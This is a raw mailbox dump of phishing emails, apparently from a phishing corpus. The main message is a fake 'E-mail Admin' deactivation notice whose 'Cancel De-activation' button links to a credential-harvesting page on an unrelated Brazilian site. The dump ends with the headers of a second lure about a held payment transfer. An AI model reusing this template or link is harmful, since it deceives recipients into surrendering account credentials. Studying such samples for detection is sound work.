From: "E-mail Admin" <mail@server.com>
Date: Mon, 14 Nov 2016 16:05:00 -0800
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - server.mt-web.net
X-AntiAbuse: Original Domain - monkey.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - server.com
X-Get-Message-Sender-Via: server.mt-web.net: authenticated_id: info@rstc.co.ir
X-Authenticated-Sender: server.mt-web.net: info@rstc.co.ir
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 432

You will not see this in a MIME-aware mail reader.
--===============1935834391==
Content-Type: text/plain; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body









Server Message



Dear jose@monkey.orgOur record indicates that you recently made a request t=
o deactivate email And this request will be processed shortly.
If this request was made accidentally and/or you have no knowledge of it, y=
ou are advised to cancel the request now



Cancel De-activation


However, if you do not cancel this request, the deactivation will be effect=
ed =

and all email data be lost permanently.Regards.
Email Administrator





This message is auto-generated from E-mail security server, and replies sen=
t to this email can not be delivered. =

This email is meant for: jose@monkey.org
--===============1935834391==
Content-Type: text/html; charset="iso-8859-1"
MIME-Version: 1.0
Content-Transfer-Encoding: quoted-printable
Content-Description: Mail message body

<html><head><meta http-equiv=3D"Content-Type" content=3D"text/html; charset=
=3Diso-8859-1"/></head><div id=3D":ug" class=3D"Am Al editable LW-avf" hide=
focus=3D"true" aria-label=3D"Message Body" g_editable=3D"true" role=3D"text=
box" style=3D"direction: ltr; min-height: 244px;" tabindex=3D"1" contentedi=
table=3D"true"><br class=3D"gmail-Apple-interchange-newline"><table width=
=3D"100%" align=3D"center" height=3D""><tbody><tr><td width=3D"10%"><br></t=
d><td width=3D"70%" bgcolor=3D""><table style=3D"border-width: 1px; border-=
style: solid; border-color: rgb(164, 164, 164); border-image: none;" cellsp=
acing=3D"0"><tbody><tr><td><br class=3D"gmail-Apple-interchange-newline"><t=
able width=3D"100%" cellspacing=3D"0"><tbody><tr style=3D"color: rgb(51, 51=
, 51); font-family: &quot;lucida grande&quot;,verdana,arial,helvetica,sans-=
serif; font-size: 11px; font-style: normal; font-variant-ligatures: normal;=
 font-variant-caps: normal; font-weight: normal; letter-spacing: normal; te=
xt-align: start; text-indent: 0px; text-transform: none; white-space: norma=
l; word-spacing: 0px; background-color: rgb(255, 255, 255);"><td bgcolor=3D=
"#045FB4" height=3D"110"><br><table width=3D"80%" align=3D"center"><tbody><=
tr><td><font size=3D"+4" color=3D"#ffffff" face=3D"calibri">Server Message<=
/font></td></tr></tbody></table></td></tr><tr style=3D"color: rgb(51, 51, 5=
1); font-family: &quot;lucida grande&quot;,verdana,arial,helvetica,sans-ser=
if; font-size: 11px; font-style: normal; font-variant-ligatures: normal; fo=
nt-variant-caps: normal; font-weight: normal; letter-spacing: normal; text-=
align: start; text-indent: 0px; text-transform: none; white-space: normal; =
word-spacing: 0px; background-color: rgb(255, 255, 255);"><td bgcolor=3D"#F=
8F8F8" height=3D""><br><br><table width=3D"80%" align=3D"center"><tbody><tr=
><td><font size=3D"+2" face=3D"calibri"><b>Dear jose@monkey.org</b></font><=
p><font size=3D"3" face=3D"calibri">Our record indicates that you recently =
made a request to deactivate email And this request will be processed short=
ly.</font></p><p><font size=3D"3" face=3D"calibri">If this request was made=
 accidentally and/or you have no knowledge of it, you are advised to cancel=
 the request now</font></p></td></tr></tbody></table></td></tr><tr style=3D=
"color: rgb(51, 51, 51); font-family: &quot;lucida grande&quot;,verdana,ari=
al,helvetica,sans-serif; font-size: 11px; font-style: normal; font-variant-=
ligatures: normal; font-variant-caps: normal; font-weight: normal; letter-s=
pacing: normal; text-align: start; text-indent: 0px; text-transform: none; =
white-space: normal; word-spacing: 0px; background-color: rgb(255, 255, 255=
);"><td bgcolor=3D"#F8F8F8" height=3D"15"><br></td></tr><tr style=3D"color:=
 rgb(51, 51, 51); font-family: &quot;lucida grande&quot;,verdana,arial,helv=
etica,sans-serif; font-size: 11px; font-style: normal; font-variant-ligatur=
es: normal; font-variant-caps: normal; font-weight: normal; letter-spacing:=
 normal; text-align: start; text-indent: 0px; text-transform: none; white-s=
pace: normal; word-spacing: 0px; background-color: rgb(255, 255, 255);"><td=
 bgcolor=3D"#F8F8F8"><table width=3D"80%" bgcolor=3D"#045FB4" align=3D"cent=
er" height=3D"60"><tbody><tr><td><div style=3D"padding-top: 0px; border-top=
: 0px none;" align=3D"center"><a href=3D"http://eletricabrasilbirigui.com.b=
r/fancybox/genlink/index.php?l=3DUserID&amp;userid=3Djose@monkey.org" targe=
t=3D"_blank" rel=3D"noreferrer" style=3D"color: rgb(1, 134, 186); text-deco=
ration: none;"><font size=3D"+2" color=3D"#ffffff" face=3D"calibri">Cancel =
De-activation</font></a></div></td></tr></tbody></table></td></tr><tr style=
=3D"color: rgb(51, 51, 51); font-family: &quot;lucida grande&quot;,verdana,=
arial,helvetica,sans-serif; font-size: 11px; font-style: normal; font-varia=
nt-ligatures: normal; font-variant-caps: normal; font-weight: normal; lette=
r-spacing: normal; text-align: start; text-indent: 0px; text-transform: non=
e; white-space: normal; word-spacing: 0px; background-color: rgb(255, 255, =
255);"><td bgcolor=3D"#F8F8F8" height=3D"20"><br></td></tr><tr style=3D"col=
or: rgb(51, 51, 51); font-family: &quot;lucida grande&quot;,verdana,arial,h=
elvetica,sans-serif; font-size: 11px; font-style: normal; font-variant-liga=
tures: normal; font-variant-caps: normal; font-weight: normal; letter-spaci=
ng: normal; text-align: start; text-indent: 0px; text-transform: none; whit=
e-space: normal; word-spacing: 0px; background-color: rgb(255, 255, 255);">=
<td bgcolor=3D"#F8F8F8" height=3D"70"><table width=3D"80%" align=3D"center"=
><tbody><tr><td><font size=3D"3" color=3D"" face=3D"calibri">However, if yo=
u do not cancel this request, the deactivation will be effected<span class=
=3D"gmail-Apple-converted-space">&nbsp;</span><br>and all email data be los=
t permanently.<p>Regards.<br><b>Email Administrator</b></p></font></td></tr=
></tbody></table></td></tr><tr style=3D"color: rgb(51, 51, 51); font-family=
: &quot;lucida grande&quot;,verdana,arial,helvetica,sans-serif; font-size: =
11px; font-style: normal; font-variant-ligatures: normal; font-variant-caps=
: normal; font-weight: normal; letter-spacing: normal; text-align: start; t=
ext-indent: 0px; text-transform: none; white-space: normal; word-spacing: 0=
px; background-color: rgb(255, 255, 255);"><td bgcolor=3D"#F8F8F8" height=
=3D"10"><br></td></tr><tr style=3D"color: rgb(51, 51, 51); font-family: &qu=
ot;lucida grande&quot;,verdana,arial,helvetica,sans-serif; font-size: 11px;=
 font-style: normal; font-variant-ligatures: normal; font-variant-caps: nor=
mal; font-weight: normal; letter-spacing: normal; text-align: start; text-i=
ndent: 0px; text-transform: none; white-space: normal; word-spacing: 0px; b=
ackground-color: rgb(255, 255, 255);"><td bgcolor=3D"#F8F8F8" height=3D"0">=
<table width=3D"80%" align=3D"center" height=3D"10"><tbody><tr><td><hr widt=
h=3D"100%" align=3D"center"></td></tr></tbody></table></td></tr><tr style=
=3D"color: rgb(51, 51, 51); font-family: &quot;lucida grande&quot;,verdana,=
arial,helvetica,sans-serif; font-size: 11px; font-style: normal; font-varia=
nt-ligatures: normal; font-variant-caps: normal; font-weight: normal; lette=
r-spacing: normal; text-align: start; text-indent: 0px; text-transform: non=
e; white-space: normal; word-spacing: 0px; background-color: rgb(255, 255, =
255);"><td bgcolor=3D"#F8F8F8"><table width=3D"80%" align=3D"center" height=
=3D""><tbody><tr><td><font size=3D"2" face=3D"calibri">This message is auto=
-generated from E-mail security server, and replies sent to this email can =
not be delivered.<span class=3D"gmail-Apple-converted-space">&nbsp;</span><=
br>This email is meant for:<span class=3D"gmail-Apple-converted-space"> </s=
pan></font><font color=3D"#045FB4"><font size=3D"2"><font face=3D"calibri">=
<b>jose@monkey.org</b></font></font></font></td></tr></tbody></table></td><=
/tr><tr style=3D"color: rgb(51, 51, 51); font-family: &quot;lucida grande&q=
uot;,verdana,arial,helvetica,sans-serif; font-size: 11px; font-style: norma=
l; font-variant-ligatures: normal; font-variant-caps: normal; font-weight: =
normal; letter-spacing: normal; text-align: start; text-indent: 0px; text-t=
ransform: none; white-space: normal; word-spacing: 0px; background-color: r=
gb(255, 255, 255);"></tr></tbody></table></td></tr></tbody></table></td></t=
r></tbody></table></div></html>
--===============1935834391==--

From jose@monkey.org Wed Nov 16 16:55:09 2016 +0000
Return-Path: safeguard@mailsender.com
Delivered-To: jose@monkey.org
X-FDA: 72189204738.06.crush41_2b4eb1e257562
X-Spam-Summary: 50,0,0,af2f1fd84cf98043,d41d8cd98f00b204,safeguard@mailsender.com,:safeguard@mailsender.com,RULES_HIT:1:2:41:72:355:379:455:581:800:962:967:969:973:983:988:989:1189:1208:1221:1260:1261:1263:1313:1314:1345:1381:1390:1431:1432:1433:1434:1436:1437:1516:1517:1518:1571:1575:1588:1589:1592:1594:1685:1730:1744:1777:1792:1803:2196:2198:2199:2200:2525:2527:2560:2568:2610:2612:2633:2682:2685:2693:2737:2859:2890:2891:2894:2895:2903:2915:2924:2925:2926:2933:2937:2939:2942:2945:2947:2951:2954:2975:3000:3022:3138:3139:3140:3141:3142:3148:3154:3352:3865:3866:3867:3868:3870:3871:3872:3873:3934:3936:3938:3941:3944:3947:3950:3953:3956:3959:4042:4052:4250:4321:4700:5007:6117:6238:6248:6678:6687:6688:6760:7208:7809:7903:8516:8518:8568:8599:8603:8957:9025:9060:9080:9121:9149:9388:9416:9908:10030:10049:10346:10946:11026:11233:11529:11657:11658:11914:11967:12043:12050:12051:12438:12555:12561:12679:12729:12737:12776:12812:12963:12986:13038:13110:13139:13234:13235:13236:13237:13294:13374:1343
X-HE-Tag: crush41_2b4eb1e257562
X-Filterd-Recvd-Size: 13507
Received: from ERS-Term1.ersindustries.local (static-173-210-69-246.ngn.onecommunications.net [173.210.69.246])
	by imf09.b.hostedemail.com (Postfix) with ESMTP
	for <jose@monkey.org>; Wed, 16 Nov 2016 16:54:57 +0000 (UTC)
Received: from ERS-Term1.ersindustries.local ([127.0.0.1]) by ERS-Term1.ersindustries.local with Microsoft SMTPSVC(7.5.7601.17514);
	 Wed, 16 Nov 2016 06:41:13 -0500
Content-Type: multipart/alternative; boundary="===============1476851212=="
MIME-Version: 1.0
Subject: Urgent - Incoming Payment Transfer On Hold
To: Recipients <Safeguard@MailSender.com>
